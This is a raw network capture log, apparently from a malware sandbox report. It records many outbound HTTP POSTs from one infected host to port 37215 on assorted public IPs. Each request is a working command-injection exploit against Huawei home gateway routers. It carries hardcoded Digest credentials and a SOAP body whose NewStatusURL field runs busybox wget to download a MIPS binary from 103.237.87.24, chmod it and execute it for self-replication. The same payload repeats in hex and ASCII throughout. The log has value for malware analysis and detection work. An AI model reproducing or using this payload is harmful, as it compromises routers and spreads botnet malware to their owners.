3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2142192.168.2.1346250197.106.37.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589420080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2143192.168.2.133935841.11.255.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589441061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2144192.168.2.134356641.214.133.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591563940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2145192.168.2.135052441.36.193.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591578007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2146192.168.2.135312241.152.208.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591593027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2147192.168.2.1342886197.30.14.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591700077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2148192.168.2.1344496157.81.94.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591720104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2149192.168.2.1345810197.121.218.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591727018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2150192.168.2.1343906177.43.4.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591803074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2151192.168.2.135961441.73.235.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591864109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2152192.168.2.135869041.18.252.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591870070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
